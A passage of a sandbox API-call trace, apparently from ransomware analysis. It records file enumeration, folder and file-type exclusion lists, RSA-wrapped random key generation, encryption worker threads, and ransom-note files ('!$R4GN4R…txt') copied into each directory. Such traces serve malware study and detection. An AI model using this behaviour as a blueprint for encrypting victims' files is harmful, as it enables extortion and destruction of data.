0x3520000 [0172.475] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cd8e0 | out: hHeap=0x3520000) returned 1 [0172.475] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc70, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0172.475] CryptImportPublicKeyInfo (in: hCryptProv=0x3556880, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x35868f4 | out: phKey=0x35868f4*=0x3548140) returned 1 [0172.476] GetProcessHeap () returned 0x3520000 [0172.476] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc70 | out: hHeap=0x3520000) returned 1 [0172.476] LocalFree (hMem=0x35948f0) returned 0x0 [0172.476] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35562a8) returned 1 [0172.477] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0172.477] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.477] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.481] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35562a8) returned 1 [0172.482] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.482] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.482] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.485] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35565d8) returned 1 [0172.486] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0172.486] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0172.486] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.489] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35562a8) returned 1 [0172.490] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.490] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.490] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.494] CryptEncrypt (in: hKey=0x3548140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.494] GetLastError () returned 0x80090016 [0172.495] CryptEncrypt (in: hKey=0x3548140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.495] GetLastError () returned 0x80090016 [0172.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x378) returned 0x3b4 [0172.496] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35562a8) returned 1 [0172.496] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0172.496] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.496] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.499] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35562a8) returned 1 [0172.500] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.500] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.500] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.504] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556b28) returned 1 [0172.504] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0172.504] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0172.505] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.507] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556990) returned 1 [0172.531] CryptGenRandom (in: hProv=0x3556990, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.531] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0172.531] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.534] CryptEncrypt (in: hKey=0x3548140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.535] GetLastError () returned 0x80090016 [0172.535] CryptEncrypt (in: hKey=0x3548140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.536] GetLastError () returned 0x80090016 [0172.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xcfc) returned 0x3f0 [0172.537] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0172.699] GetProcessHeap () returned 0x3520000 [0172.699] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35868f0 | out: hHeap=0x3520000) returned 1 [0172.699] CloseHandle (hObject=0x3b4) returned 1 [0172.699] GetProcessHeap () returned 0x3520000 [0172.699] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0172.701] CloseHandle (hObject=0x3f0) returned 1 [0172.701] GetProcessHeap () returned 0x3520000 [0172.701] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0172.703] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0172.703] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0172.706] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Windows") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Windows.old") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Tor browser") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Internet Explorer") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Google") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Opera") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Opera Software") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Mozilla") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="Mozilla Firefox") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="$Recycle.Bin") returned 1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="ProgramData") returned -1 [0172.706] lstrcmpiW (lpString1="1036", lpString2="All Users") returned -1 [0172.706] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0172.706] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1036" | out: lpString1="1036") returned="1036" [0172.706] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\" [0172.706] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1036\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\" [0172.706] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\!$R4GN4R_B8CF767A$!.txt" [0172.706] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1036\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0172.717] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*" [0172.717] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.717] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.717] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.717] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x35481c0 [0172.717] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0172.717] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf4498dc1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.719] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0172.719] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0172.719] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf448ddb3, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf448ddb3, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.719] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0172.719] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0172.719] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.719] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0172.719] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0172.719] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.720] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0172.720] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0172.720] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.720] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0172.720] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0172.720] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.720] FindClose (in: hFindFile=0x35481c0 | out: hFindFile=0x35481c0) returned 1 [0172.720] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x35481c0 [0172.720] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf4498dc1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf4498dc1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.720] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf448ddb3, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf448ddb3, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.721] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.721] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0172.721] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0172.721] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0172.721] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.721] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.721] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0172.721] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned=".rtf" [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0172.721] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0172.722] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0172.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0172.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0172.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0172.722] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0172.722] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0172.722] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0172.722] GetProcessHeap () returned 0x3520000 [0172.722] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0172.724] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" [0172.724] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.724] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.724] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0172.724] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned=".xml" [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0172.725] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0172.725] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0172.725] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0172.725] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0172.725] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0172.725] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0172.726] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0172.726] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0172.726] GetProcessHeap () returned 0x3520000 [0172.726] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0172.727] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0172.727] FindNextFileW (in: hFindFile=0x35481c0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.727] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1036\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.727] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0172.727] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned=".dll" [0172.727] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.727] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0172.728] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 